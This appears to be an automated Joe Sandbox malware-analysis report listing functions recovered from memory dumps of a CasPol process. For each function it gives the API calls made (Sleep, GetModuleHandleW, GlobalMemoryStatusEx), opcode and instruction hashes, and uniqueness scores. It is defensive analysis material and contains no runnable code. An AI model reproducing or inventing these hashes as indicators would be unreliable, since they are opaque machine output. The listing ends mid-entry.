                                                                • Instruction ID: 946d75433fba4a8d738a0498b641e88a0ea4820672fdb1f43c554ffe1fea42d9
                                                                • Opcode Fuzzy Hash: 6e8124e7a26c566ab01dc9627aecc9f1a24469385813566344113c32977ce32b
                                                                • Instruction Fuzzy Hash: B71103B1C046699FCB10CF9AD4447DEFBB4AF48324F15826AD868B7280D378A945CFE1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,05EEAE92), ref: 05EEAF7F
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.784038218.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5ee0000_CasPol.jbxd
                                                                Similarity
                                                                • API ID: GlobalMemoryStatus
                                                                • String ID:
                                                                • API String ID: 1890195054-0
                                                                • Opcode ID: e3ce0e391afbba16525a405e81daa36665e91f3a4ef2a13eba060ec1eef4a6b7
                                                                • Instruction ID: 4eb2266268d0fa865d913983ac85ccaaa2eef4d2a60cbdc633c476d4f9ba3325
                                                                • Opcode Fuzzy Hash: e3ce0e391afbba16525a405e81daa36665e91f3a4ef2a13eba060ec1eef4a6b7
                                                                • Instruction Fuzzy Hash: B51100B1C046699BDB10CF9AC548BDEFBB4AB48224F15816AE858B7240D378A945CFE1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • RtlEncodePointer.NTDLL(00000000), ref: 023F593A
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.767254347.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_23f0000_CasPol.jbxd
                                                                Similarity
                                                                • API ID: EncodePointer
                                                                • String ID:
                                                                • API String ID: 2118026453-0
                                                                • Opcode ID: eea65e969f76755610f2200ff43eecd4cd1870f98c6a6cc30c9234c5558d16db
                                                                • Instruction ID: 205d7707f46167dfd7669199264acbbbedbf4f602032bd40e0c6f79c6bcaf0a6
                                                                • Opcode Fuzzy Hash: eea65e969f76755610f2200ff43eecd4cd1870f98c6a6cc30c9234c5558d16db
                                                                • Instruction Fuzzy Hash: 2211BEB190034A8FDB50DFA9E4487DFBBF4FB48324FA4842AD948A7640C7396944CFA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 05EECE16
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.784038218.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5ee0000_CasPol.jbxd
                                                                Similarity
                                                                • API ID: HandleModule
                                                                • String ID:
                                                                • API String ID: 4139908857-0
                                                                • Opcode ID: 34bef7c80b5f4e831a639a2a5d6b5b219001508101a76d9195cd9768796e03bb
                                                                • Instruction ID: 607cf8c7203b68ec7530207cd13cc216523fa33e0e8129ac5860e5b565108a13
                                                                • Opcode Fuzzy Hash: 34bef7c80b5f4e831a639a2a5d6b5b219001508101a76d9195cd9768796e03bb
                                                                • Instruction Fuzzy Hash: 8A219FB1C083858FDB15CFA9C4443CEFFB0BF49214F15849AC4A8AB651C3746506CFA2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 05EECE16
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.784038218.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5ee0000_CasPol.jbxd
                                                                Similarity
                                                                • API ID: HandleModule
                                                                • String ID:
                                                                • API String ID: 4139908857-0
                                                                • Opcode ID: f54d66cb158d931b723b178a141ddb9904e489b77f2f69f87ca25064eeaf92ef
                                                                • Instruction ID: 34dec901857e709b91011f3e6d834baf31d6ed19f83faefe1f3849a1a8005d95
                                                                • Opcode Fuzzy Hash: f54d66cb158d931b723b178a141ddb9904e489b77f2f69f87ca25064eeaf92ef
                                                                • Instruction Fuzzy Hash: A01120B2C003498BDB20CF9AC444BDEFBF4EB88224F10846AD869B7210D374A945CFA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 05EECE16
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.784038218.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5ee0000_CasPol.jbxd
                                                                Similarity
                                                                • API ID: HandleModule
                                                                • String ID:
                                                                • API String ID: 4139908857-0
                                                                • Opcode ID: ebae2137ee41e9062a7278d385ae119e9dad5f35dfb4bcab9be35f21265937e4
                                                                • Instruction ID: 063176d8aac3378edd2036e9155b30c4dbac292e0791a6c3616a4d81c1ee75df
                                                                • Opcode Fuzzy Hash: ebae2137ee41e9062a7278d385ae119e9dad5f35dfb4bcab9be35f21265937e4
                                                                • Instruction Fuzzy Hash: F211F0B6C003498BDB20CF9AD444BDEFBF4AB88224F14855AD469A7650D374A545CFA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.782132101.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5e90000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: P@?k
                                                                • API String ID: 0-409849746
                                                                • Opcode ID: cdc58e5cb0c09b6c1c8b19482df79c59816f57ccc82710997d01231c66dcf428
                                                                • Instruction ID: 655502ee1a91c0d8a4d9b3be53cda75f5856a7cfba9a72c103c7a950a21ee9ec
                                                                • Opcode Fuzzy Hash: cdc58e5cb0c09b6c1c8b19482df79c59816f57ccc82710997d01231c66dcf428
                                                                • Instruction Fuzzy Hash: CD419C75E0420BCFDF1DDFA0D4146AEBBB2BF85308F20952AD846AB240DB349946CF81
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.782132101.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5e90000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: D0)l
                                                                • API String ID: 0-287000446
                                                                • Opcode ID: 076ec39e0545f9865075cfe9a224bb6bc80dd9c16d80a9741c717b3228ad8690
                                                                • Instruction ID: 0bef0b73c204f3f01f350d630eef8464d3c80f285343c81e5a61494133b14064
                                                                • Opcode Fuzzy Hash: 076ec39e0545f9865075cfe9a224bb6bc80dd9c16d80a9741c717b3228ad8690
                                                                • Instruction Fuzzy Hash: A8216D30B141189FEF18EBA4D858AEEB7B7EF88318F505029D546B7284EF345D418B66
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.767254347.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_23f0000_CasPol.jbxd
                                                                Similarity
                                                                • API ID: Sleep
                                                                • String ID:
                                                                • API String ID: 3472027048-0
                                                                • Opcode ID: 43cd0a41c06ee1db9a4f91127b23b0ee0ecb782d4c4838c647fab8620a5e2ef3
                                                                • Instruction ID: 02c07a64515c7bf576abf470da9959688d104652a8434dbadc7b45e4185b9c84
                                                                • Opcode Fuzzy Hash: 43cd0a41c06ee1db9a4f91127b23b0ee0ecb782d4c4838c647fab8620a5e2ef3
                                                                • Instruction Fuzzy Hash: 4B1145B48042498FCB20CF89D484BDEFBF4EB48324F108469D559A7251D374A940CFA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.767254347.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_23f0000_CasPol.jbxd
                                                                Similarity
                                                                • API ID: Sleep
                                                                • String ID:
                                                                • API String ID: 3472027048-0
                                                                • Opcode ID: 163780d91ca4130b20a6bf86da19de333a25b8b352fe79639e78ee4dd07291f9
                                                                • Instruction ID: 33a6c5b05d3d2a85aec3301de89aa4ae5bf4ab5c8d731d6219563eb7867c9e07
                                                                • Opcode Fuzzy Hash: 163780d91ca4130b20a6bf86da19de333a25b8b352fe79639e78ee4dd07291f9
                                                                • Instruction Fuzzy Hash: EE1133B48002498FCB10CF99D485BDEFBF4AB48324F24845AD558A7601C378A945CFA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.782132101.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5e90000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: da78240630ac76a8caa8870f8273a159f9e5ebd6efb343b9d8b04698f99d5317
                                                                • Instruction ID: 43a0d793b6f71aff774387317bdbfa9962cad2b4581b5edb3506f956811803ec
                                                                • Opcode Fuzzy Hash: da78240630ac76a8caa8870f8273a159f9e5ebd6efb343b9d8b04698f99d5317
                                                                • Instruction Fuzzy Hash: 7D32A031B002148FDB19EBB4D4547AEB7E3AF88308F148569D95ADB391EF38DC468B91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.782132101.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5e90000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: df0ffcd43093eb1487748664dc75e6132051ff0f4baf366646119ce841e053f9
                                                                • Instruction ID: 0817e6bd66288c62776960ebf39128d8eea96478761573f99d6e5854a2537ac4
                                                                • Opcode Fuzzy Hash: df0ffcd43093eb1487748664dc75e6132051ff0f4baf366646119ce841e053f9
                                                                • Instruction Fuzzy Hash: DAD1F634B093418FEF1A9B7494147AA7BB3BF82208F1644AAD589CB792EB758C078751
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.782132101.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5e90000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 245e327305d996b9ab2f538a11a12e589676530c9588ee4bcf13e3acbf8e336f
                                                                • Instruction ID: 1a85b48f378f4e754e08daae68becd038985b6c2a5d9de656b6fa0909ea77526
                                                                • Opcode Fuzzy Hash: 245e327305d996b9ab2f538a11a12e589676530c9588ee4bcf13e3acbf8e336f
                                                                • Instruction Fuzzy Hash: 15E18030B042158FDB19DB78C854BAEBBF3AF89304F1580A9D549EB395EB349C45CB91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.782132101.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5e90000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9586722e191dfaed9202e5038492c12c3aeabeb38dd9b4eabf7bfce912090da6
                                                                • Instruction ID: dff9f7100bedebb15af3d8bb7ccbbfb8251cbb3f58d7beadd03771f299b2f19f
                                                                • Opcode Fuzzy Hash: 9586722e191dfaed9202e5038492c12c3aeabeb38dd9b4eabf7bfce912090da6
                                                                • Instruction Fuzzy Hash: E3A1C471A042198BDF18CB69D8847BEFBE2EB86324F18956DD469EB682C735D840C750
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.782132101.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5e90000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 53a92162eb210b5fc5a3431323620fed6acf7705c82d0430362db33ce049a531
                                                                • Instruction ID: 92ad18c46415dc47f1bd59d5c5450fddaac8fb360706f05957a980bef48c57ae
                                                                • Opcode Fuzzy Hash: 53a92162eb210b5fc5a3431323620fed6acf7705c82d0430362db33ce049a531
                                                                • Instruction Fuzzy Hash: D4A19F35A04249DFDF19DFA4C844AEEBBB2FF89314F208156E84AAB361D770AC45CB50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.782132101.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5e90000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e471119e81337f1c7cc8b2fe7b827f45310322bc7777c1235d75ad79e6409eb3
                                                                • Instruction ID: 378655a85a9078b5745f62fcb641fd30a361d93c93f450a3742f2b1d2818b4c8
                                                                • Opcode Fuzzy Hash: e471119e81337f1c7cc8b2fe7b827f45310322bc7777c1235d75ad79e6409eb3
                                                                • Instruction Fuzzy Hash: EF812830A083869FEB0DDB64D804BA67BB2AF41304F0584B6E584DB797EB75DC05C751
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.782132101.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5e90000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5103af80e8151e173e1daeef2fdab6dc8c9b303625390f7fb784cc7e0dfcc46e
                                                                • Instruction ID: 6285dbeb11345b3fb93454938f3a6b87e25dc072ceff5e4095df596f28664bb8
                                                                • Opcode Fuzzy Hash: 5103af80e8151e173e1daeef2fdab6dc8c9b303625390f7fb784cc7e0dfcc46e
                                                                • Instruction Fuzzy Hash: 9F91E270B042408BEF1A8B28D5447AABBA2AFC6308F14D1ABD559DF396E7768C05C791
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.782132101.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5e90000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e7185c716108dcb35ac41c07b2d7ab0bdfe0cce7844430c8976857c9cc76fee3
                                                                • Instruction ID: eee4e5b22dd3c14606762e9ce8a131e1f8d5bc4fdf0ed7d33978e87bcb46fc19
                                                                • Opcode Fuzzy Hash: e7185c716108dcb35ac41c07b2d7ab0bdfe0cce7844430c8976857c9cc76fee3
                                                                • Instruction Fuzzy Hash: 05915C74E0061A8BDF18EFF0D5446AEB7F6BF84304F10496AD506AB744EB34A946CF90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.782132101.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5e90000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c5240941c9c97a97fe8df1190ed97b4af5ccaf42ac13f99a848a69f401e00608
                                                                • Instruction ID: dba273d3b0c8bdf60d7872fe0024d3b1025cae156f93b160e68bf38642d945f0
                                                                • Opcode Fuzzy Hash: c5240941c9c97a97fe8df1190ed97b4af5ccaf42ac13f99a848a69f401e00608
                                                                • Instruction Fuzzy Hash: E8716130B002149FDB08EBB5D4687AE76E3AFC8358F148539D906DB784EF389C068B91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.782132101.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5e90000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a1f1afbd9623f077a0da8b09a93123fa7e925d85abbd6f29451c2069f8f694df
                                                                • Instruction ID: 1b9c0995b67818522853ffd5d7106b41d22b2184ea728f0e5d87c6476674ee14
                                                                • Opcode Fuzzy Hash: a1f1afbd9623f077a0da8b09a93123fa7e925d85abbd6f29451c2069f8f694df
                                                                • Instruction Fuzzy Hash: BE71A130B042188FCB59EBB8D4546AEBBF2FF88204B158869D149D7355EF34DC06CBA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.782132101.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5e90000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 02fb463b2323da2bb3111d6e7f62826eeabf6c8143e2cd3e8262f432760617bb
                                                                • Instruction ID: fb0ea32957621b81455855e35812846ce5343e7fb3f0ba0b0f0b7b2b1aaa2d65
                                                                • Opcode Fuzzy Hash: 02fb463b2323da2bb3111d6e7f62826eeabf6c8143e2cd3e8262f432760617bb
                                                                • Instruction Fuzzy Hash: 6B712E747042058FDF18EF69C488A7E7BE6BF49608B2510A9E88ACB371DB70DC41CB51
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.782132101.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5e90000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2202ebefbb97ecfe332d9abad4986ca52cc47ffad8d147b67c28edb9f57ac594
                                                                • Instruction ID: d4de5b11e8d3afadfc8daeb1bdd5eb52221bc52788040033e5b0792df938b94c
                                                                • Opcode Fuzzy Hash: 2202ebefbb97ecfe332d9abad4986ca52cc47ffad8d147b67c28edb9f57ac594
                                                                • Instruction Fuzzy Hash: C4511132B001248FEF18D778C8487AEB6A2EF89314F558079DA59DF791DB34DC418791
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.782132101.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5e90000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cba4a840dab8fed260a15ea377cd0920109953b5df34f4ab060a1c8ebef2b13f
                                                                • Instruction ID: 5fc5e4e9e50dfad0f2d81860f1b9d7b8c3fef2213be8a6da1112216d5993d7b8
                                                                • Opcode Fuzzy Hash: cba4a840dab8fed260a15ea377cd0920109953b5df34f4ab060a1c8ebef2b13f
                                                                • Instruction Fuzzy Hash: 5D41E331B002184FDB59AB78D8156AE77E7EFC9308F10447AD509DB396EE38DC068B91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.782132101.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5e90000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d1034951b62837f908f7aa60673a639bb2c916b18fdcf50df706fc0735666f89
                                                                • Instruction ID: e75d708b84d1f2415c32f1834aba3ef292ee4a2f5962177b147ed1f61ee61d0a
                                                                • Opcode Fuzzy Hash: d1034951b62837f908f7aa60673a639bb2c916b18fdcf50df706fc0735666f89
                                                                • Instruction Fuzzy Hash: 78418175B002148FDF19DBB4D428B7E76E3AF88754F149429D906DB790EF388C028B91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.782132101.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5e90000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f26a5c37368e0cce7dcd65bfeb837608071a36fa1cc61738e3686edfb65d043b
                                                                • Instruction ID: feb1a883bc20a6ef1e2f995e0840580df7442aaccba1df700075cdcbb92df150
                                                                • Opcode Fuzzy Hash: f26a5c37368e0cce7dcd65bfeb837608071a36fa1cc61738e3686edfb65d043b
                                                                • Instruction Fuzzy Hash: BA3157B6B041108FDF2C972C849C6BEB6D7EFC6208B95947AC48ADB351EA60DC428390
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.782132101.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5e90000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 44570c74ff4f94ac8e100af31c4fa72cce174b5ce322ab4a57fb89f31d41a419
                                                                • Instruction ID: 2285c40b718394e7e89167aee1aa0dfb0b922949b51bf3ee30e915c350b7f8ef
                                                                • Opcode Fuzzy Hash: 44570c74ff4f94ac8e100af31c4fa72cce174b5ce322ab4a57fb89f31d41a419
                                                                • Instruction Fuzzy Hash: 9741E531A04249DFDF19DFA4C840AEEBBB2FF49354F108156E999AB291D330ED10CB60
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.782132101.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5e90000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f8c9ff1796d56ef04a0e5052b2c5a3e98d466e2629f41baf75174fba7b79f16f
                                                                • Instruction ID: 25733b681decbf2660c59edba4d9083a89953cb2740c52e30114db9b1f0df2ec
                                                                • Opcode Fuzzy Hash: f8c9ff1796d56ef04a0e5052b2c5a3e98d466e2629f41baf75174fba7b79f16f
                                                                • Instruction Fuzzy Hash: DE310939B082449FEF05977498187AA7BB3EF95305F0540B6D649DB787DF288C068791
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.782132101.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5e90000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 981d303f8c9ee149d4634cf0b526ebe50a2938598aeac33928abd19ae3ce97e9
                                                                • Instruction ID: 622045043872779f60aaf758f46d4f721c377ef346ea1051fc1c58c875fe7712
                                                                • Opcode Fuzzy Hash: 981d303f8c9ee149d4634cf0b526ebe50a2938598aeac33928abd19ae3ce97e9
                                                                • Instruction Fuzzy Hash: 13316E30B002099FDB18DB78C895BEEB7F3AF89714F148069E505AB391EB71AC41CB94
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.782132101.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5e90000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f5be9b972f7e76a512f9ff901d5c796d2fda311b8b5a4a2ab4f3633df34c604b
                                                                • Instruction ID: 0fc63cc301a709f157fc929e96818baa2b7a80c44dea8c9286edcf7bfe139482
                                                                • Opcode Fuzzy Hash: f5be9b972f7e76a512f9ff901d5c796d2fda311b8b5a4a2ab4f3633df34c604b
                                                                • Instruction Fuzzy Hash: 25312235E042498FEF199BA8E8446DEBBB2EF85319F1504A2D645D7282E674880ACB80
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.782132101.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5e90000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a4052a4c7e32b5c238034a1e71cd69753fa8eb979392b2af81713bcebdd688eb
                                                                • Instruction ID: d9aa09bb481dc8925a6560a5bb965a57007a2a24764236880be1fb65ecf6c339
                                                                • Opcode Fuzzy Hash: a4052a4c7e32b5c238034a1e71cd69753fa8eb979392b2af81713bcebdd688eb
                                                                • Instruction Fuzzy Hash: D821E434F001049FCF54EB7DD404AEE7BF2EB89604B1484AAD949EB342EA389D07C7A0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.782132101.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5e90000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 922b30d579970eaa50dcff7d015aa4cd0d8867c6d7ff56f026eef35e84d8a281
                                                                • Instruction ID: fbe952f029f7c9299de3921f6eec34553e2aeb8078f8595b289e9a60e6de0683
                                                                • Opcode Fuzzy Hash: 922b30d579970eaa50dcff7d015aa4cd0d8867c6d7ff56f026eef35e84d8a281
                                                                • Instruction Fuzzy Hash: 6B21B1347097818FEB1B86299C10A663BA39F83708F1650E7E588CF393E665CC058791
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.782132101.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5e90000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e40b2850c9e9237c595bb765364b9b63c2bcbf19381bbe5597e0f04b87716cd6
                                                                • Instruction ID: 11c6d6cece66384a1bc1b03b451dc9ba0a8f7696bc9b034e3d5d521b03173b19
                                                                • Opcode Fuzzy Hash: e40b2850c9e9237c595bb765364b9b63c2bcbf19381bbe5597e0f04b87716cd6
                                                                • Instruction Fuzzy Hash: B9218730D5071ECBDB04EFA5D8446DEF7B2FF84308F119929E505E7601DB70A95A8B90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.782132101.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5e90000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 80ec01c97e6d2ad68c58eb92b42198998e4535cb606e640ac96001417124bb9d
                                                                • Instruction ID: 73b9dc0e65e92aa6d37f5f226f92a70e30926b7bd392f84eadcf1cde2d80fb3c
                                                                • Opcode Fuzzy Hash: 80ec01c97e6d2ad68c58eb92b42198998e4535cb606e640ac96001417124bb9d
                                                                • Instruction Fuzzy Hash: 4E216575F082418FDB06A77888046AE7FF29F46215F2541B7D189DB383EA788C0687D2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
